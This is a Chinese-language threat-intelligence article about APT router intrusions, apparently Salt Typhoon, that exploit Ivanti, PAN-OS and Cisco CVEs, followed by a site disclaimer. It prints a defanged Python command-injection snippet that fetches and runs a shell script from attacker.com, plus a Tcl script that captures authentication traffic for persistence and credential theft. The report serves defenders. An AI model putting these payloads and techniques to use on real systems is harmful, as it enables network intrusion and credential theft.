在过去的几年里,某高级持续威胁 (APT) 组织的协调一致的活动利用了企业级路由器中的关键漏洞,在全球电信和政府网络中建立了长期立足点。
这些参与者通常以 Salt Typhoon 和 OPERATOR PANDA 等绰号识别,系统地针对来自领先供应商的提供商边缘 (PE) 和客户边缘 (CE) 设备,利用公开披露的常见漏洞和暴露 (CVE) 来获得最初未经授权的访问。
他们的作表现出高度的隐蔽性,将多个漏洞链接起来横向移动并规避传统的检测工具。
典型的多阶段攻击流从 Web 组件注入开始,最终以嵌入式数据包捕获结束。
在最初的入侵尝试中,威胁行为者通常会利用 Ivanti Connect Secure 中的 CVE-2024-21887 和 Palo Alto Networks PAN-OS GlobalProtect 中的 CVE-2024-3400。
这些缺陷允许通过精心设计的 HTTP 请求进行远程代码执行,从而为攻击者在路由器的特权管理界面中提供了立足点。
虽然研究人员指出,一旦实现访问,攻击者就会迅速转向,利用较旧的漏洞,例如 Cisco IOS 智能安装中的 CVE-2018-0171 和 IOS XE Web 管理模块中的 CVE-2023-20198,从而创建可靠的升级和持久性链。
Cyble 分析师发现,公开可用的概念验证漏洞利用代码正在快速武器化,这些代码通常在 Python 或 Tcl 脚本中定制,以适应特定的路由器环境。
下面显示了这些活动中使用的代表性片段,演示了通过 Web 管理界面进行命令注入:-
import requests
url = "https[:]//192.0.2.1/+CSCOE+/translation-table?type=misc&text_scale=1"
payload = {"command"[:] "system ('curl http[:]//attacker.com/shell[.]sh | sh')"}
response = requests[.]post (url, data=payload, verify=False)
print (response[.]status_code, response[.]text)利用这种技术,攻击者可以实现远程 shell 执行,随后部署自定义工具来收集配置文件、凭据和会话数据。
坚持策略
在初始访问后, APT 组织专注于将自己深深嵌入路由器的运行环境中,以确保使用寿命。
他们更改访问控制列表 (ACL) 以将攻击者控制的 IP 地址列入白名单,并打开非标准端口(例如 32768 和 8081)以进行秘密访问。
在许多情况下,不法分子利用思科的嵌入式数据包捕获 (EPC) 功能来窃取 TACACS+ 和 RADIUS 身份验证流量,从而有效地收集明文凭证。为了实现自动化,他们部署了存储在路由器闪存中的基于 Tcl 的脚本:
package require json
set cap Cmd [list "ip" "packet" "capture" "point-to-point" "rtl" "1000"]
exec {*}$capCmd > flash:auth_capture[.]pcap这些脚本在启动时运行,通过更改的启动配置触发,创建持久性 PCAP 文件,这些文件会定期通过加密的 GRE 隧道泄露。
通过纵 AAA(身份验证、授权、记帐)配置,攻击者重定向日志并禁用警报功能,从而有效地使企业防御者失明。
通过这些方法,受感染的设备成为更广泛的企业渗透的可靠启动板,使 APT 行为者能够保持数月甚至数年的隐秘存在。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
